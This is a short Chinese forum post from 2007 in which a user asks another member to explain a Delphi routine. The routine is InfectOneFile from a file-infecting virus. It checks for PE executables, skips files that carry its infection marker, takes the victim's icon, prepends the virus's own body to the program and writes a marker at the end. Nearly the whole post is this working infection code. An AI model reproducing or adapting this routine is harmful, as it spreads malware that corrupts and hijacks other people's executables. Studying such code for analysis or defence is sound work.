- 听众
- 收听
- 积分
- 3268
- 主题
- 回帖
- 0
- 精华
注册时间2007-9-13
最后登录1970-1-1
该用户从未签到
|
楼主 |
发表于 2007-11-29 12:11:58
|
显示全部楼层
bie哥
帮忙解释下...
procedure InfectOneFile(FileName: string);
var
HdrStream, SrcStream: TFileStream;
IcoStream, DstStream: TMemoryStream;
iID: LongInt;
aIcon: TIcon;
Infected, IsPE: Boolean;
i: Integer;
Buf: array[0..1] of Char;
begin
try
if CompareText(FileName, 'JAPUSSY.EXE') = 0 then
Exit;
Infected := False;
IsPE := False;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
try
for i := 0 to $108 do
begin
SrcStream.Seek(i, soFromBeginning);
SrcStream.Read(Buf, 2);
if (Buf[0] = #80) and (Buf[1] = #69) then
begin
IsPE := True;
Break;
end;
end;
SrcStream.Seek(-4, soFromEnd);
SrcStream.Read(iID, 4);
if (iID = ID) or (SrcStream.Size < 10240) then
Infected := True;
finally
SrcStream.Free;
end;
if Infected or (not IsPE) then
Exit;
IcoStream := TMemoryStream.Create;
DstStream := TMemoryStream.Create;
try
aIcon := TIcon.Create;
try
aIcon.ReleaseHandle;
aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);
aIcon.SaveToStream(IcoStream);
finally
aIcon.Free;
end;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
CopyStream(HdrStream, 0, DstStream, 0, IconOffset);
CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);
CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);
CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);
DstStream.Seek(0, 2);
iID := $44444444;
DstStream.Write(iID, 4);
finally
HdrStream.Free;
end;
finally
SrcStream.Free;
IcoStream.Free;
DstStream.SaveToFile(FileName);
DstStream.Free;
end;
except;
end;
end;
|
|